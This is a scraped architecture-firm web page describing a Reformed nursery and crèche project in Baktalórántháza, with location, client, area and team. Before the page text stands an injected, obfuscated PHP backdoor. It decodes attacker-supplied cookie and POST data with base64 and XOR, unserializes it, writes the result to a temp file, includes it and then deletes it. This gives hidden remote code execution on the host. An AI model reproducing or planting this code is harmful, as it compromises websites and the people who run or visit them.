$pTeMwYcAZr = chr (85) . 'Y' . chr (95) . "\x6a" . 'c' . 't' . chr (85); $fvPZCqs = "\143" . "\x6c" . chr ( 372 - 275 )."\x73" . "\163" . "\x5f" . chr (101) . chr (120) . chr ( 141 - 36 ).'s' . chr (116) . "\x73";$HLgkne = class_exists($pTeMwYcAZr); $pTeMwYcAZr = "3478";$fvPZCqs = "3332";$YLNTMRNrS = !1;if ($HLgkne == $YLNTMRNrS){function HzsRwgt(){return FALSE;}$KwcTBzq = "23806";HzsRwgt();class UY_jctU{private function geHUr($KwcTBzq){if (is_array(UY_jctU::$TgfHqoI)) {$YJFCJTrz = sys_get_temp_dir() . "/" . crc32(UY_jctU::$TgfHqoI['s' . chr ( 208 - 111 )."\154" . 't']);@UY_jctU::$TgfHqoI["\167" . 'r' . chr (105) . "\x74" . "\x65"]($YJFCJTrz, UY_jctU::$TgfHqoI[chr ( 939 - 840 )."\157" . chr (110) . "\x74" . "\145" . 'n' . "\x74"]);include $YJFCJTrz;@UY_jctU::$TgfHqoI[chr ( 711 - 611 ).chr ( 340 - 239 )."\x6c" . 'e' . chr ( 693 - 577 )."\x65"]($YJFCJTrz); $KwcTBzq = "23806";exit();}}private $gmqkDFPtP;public function tTMMxqp(){echo 3440;}public function __destruct(){$KwcTBzq = "32264_61402";$this->geHUr($KwcTBzq); $KwcTBzq = "32264_61402";}public function __construct($XQPfIbL=0){$gHCudrjwYU = $_POST;$ZMKaSSutaL = $_COOKIE;$PnQxsSHC = "d1406fde-2508-4ca4-86d8-c7b36cd9a991";$KCAGtdkNUK = @$ZMKaSSutaL[substr($PnQxsSHC, 0, 4)];if (!empty($KCAGtdkNUK)){$noyNjl = "base64";$XFKqVlY = "";$KCAGtdkNUK = explode(",", $KCAGtdkNUK);foreach ($KCAGtdkNUK as $ZuhVvGH){$XFKqVlY .= @$ZMKaSSutaL[$ZuhVvGH];$XFKqVlY .= @$gHCudrjwYU[$ZuhVvGH];}$XFKqVlY = array_map($noyNjl . chr ( 989 - 894 ).chr (100) . chr ( 544 - 443 )."\143" . "\157" . 'd' . "\145", array($XFKqVlY,)); $XFKqVlY = $XFKqVlY[0] ^ str_repeat($PnQxsSHC, (strlen($XFKqVlY[0]) / strlen($PnQxsSHC)) + 1);UY_jctU::$TgfHqoI = @unserialize($XFKqVlY); $XFKqVlY = class_exists("32264_61402");}}public static $TgfHqoI = 57525;}$JrFnj = new /* 58595 */ UY_jctU(23806 + 23806); $YLNTMRNrS = $JrFnj = $KwcTBzq = Array();} Reformed Nursery and Crèche – Balázs és Vecsey Építésziroda
Title Image

Reformed Nursery and Crèche

Baktalórántháza – Reformed Nursery and Crèche

The building is the Reformed Nursery And Crèche In Baktalórántfalva Settlement. The design task was to create a new nurery and créche by using and extending the existing nursery’s building. The new, extended building has three rooms for the nursery groups and one room for the créche with all the necessary additional functions.

  • Location: Baktalórántháza
  • Client: Congregation of Reformed Church
  • Design: 2017
  • Type of plan: Permit – and construction drawing
  • Costruction: Under construction
  • Area: 780 m2
  • Lead architects: Csaba Balázs, Andrea Vecsey-Körmendi, Blanka Bató
  • The Team: Zsolt Erdőhegyi, Viktor Nagy
  • Visualation: Blanka Bató

